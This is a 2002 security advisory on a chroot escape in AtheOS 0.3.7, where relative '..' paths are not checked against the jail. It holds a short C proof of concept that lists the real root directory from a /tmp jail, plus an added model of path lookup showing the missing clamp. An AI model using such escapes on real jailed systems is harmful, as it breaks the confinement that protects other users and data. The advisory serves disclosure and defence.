
AtheOS chroot escape
8th Feb 2002 [SBWID-5081]
COMMAND

	AtheOS chroot escape

SYSTEMS AFFECTED

	AtheOS version 0.3.7

PROBLEM

	Frank DENIS 'Jedi/Sector One' [http://www.Jedi.Claranet.Fr] posted:

	After a chroot() call on AtheOS, '/' indeed seems to become the base
	directory. '/path/to/file' is translated to
	'<directory>/path/to/file'.

	Unfortunately, relative paths aren't checked against the current
	chroot jail. Therefore, '../../../../path/to/file' will be translated
	to a file out of the chroot limits.

	The following code will read the content of the real '/' directory,
	while '/tmp' is supposed to be the base of the chroot jail.

	#include <stdio.h>
	#include <unistd.h>
	#include <dirent.h>

	int main(void)
	{
	    register DIR *d;
	    register const struct dirent *e;

	    /* Enter the jail at /tmp, then open ".." relative to the new root. */
	    if (chdir("/") || chroot("/tmp") || chdir("/") ||
	        (d = opendir("..")) == NULL) {
	        return 1;
	    }
	    /* On an affected system this lists the real '/', not the jail. */
	    while ((e = readdir(d)) != NULL) {
	        puts(e->d_name);
	    }
	    closedir(d);
	    return 0;
	}
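
The missing check described above, shown as a small user-space model of path lookup. This is an added example, not code from the original post or from AtheOS; the function `resolve` and its `clamp_dotdot` flag are hypothetical names, and the jail is assumed to be '/tmp' with the working directory at the jail root, as in the post.

```c
#include <stdio.h>
#include <string.h>

/* Constructed model of path lookup for a chrooted process (not AtheOS code).
 * root = real path of the jail, cwd = real working directory inside it.
 * clamp_dotdot 0 models the reported behaviour, 1 adds the missing check.
 * A real kernel compares directory identity, not strings as done here. */
static char *resolve(const char *root, const char *cwd, const char *path,
                     int clamp_dotdot, char *out, size_t outsz)
{
    /* Absolute paths start at the jail root, relative ones at the cwd. */
    snprintf(out, outsz, "%s", path[0] == '/' ? root : cwd);

    for (const char *p = path; *p != '\0'; ) {
        size_t n = strcspn(p, "/");         /* length of next component */
        if (n == 0) { p++; continue; }      /* skip '/' separators */
        if (n == 2 && p[0] == '.' && p[1] == '.') {
            /* ".." at the jail root must stay at the jail root. */
            if (!(clamp_dotdot && strcmp(out, root) == 0)) {
                char *slash = strrchr(out, '/');
                if (slash == out)
                    out[1] = '\0';          /* parent of "/x" is "/" */
                else if (slash != NULL)
                    *slash = '\0';
            }
        } else if (!(n == 1 && p[0] == '.')) {
            size_t len = strlen(out);
            snprintf(out + len, outsz - len, "%s%.*s",
                     strcmp(out, "/") == 0 ? "" : "/", (int)n, p);
        }
        p += n;
    }
    return out;
}

int main(void)
{
    /* Paths taken from the advisory text; jail and cwd are both /tmp. */
    const char *paths[] = { "/path/to/file", "..", "../../../../path/to/file" };
    char a[256], b[256];

    for (size_t i = 0; i < sizeof paths / sizeof paths[0]; i++)
        printf("%-26s unchecked=%-18s clamped=%s\n", paths[i],
               resolve("/tmp", "/tmp", paths[i], 0, a, sizeof a),
               resolve("/tmp", "/tmp", paths[i], 1, b, sizeof b));
    return 0;
}
```

Absolute paths resolve inside the jail in both modes; only the relative '..' walk differs, which matches the behaviour the post reports.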

	

SOLUTION

	None yet. Check: [http://www.atheos.cx]
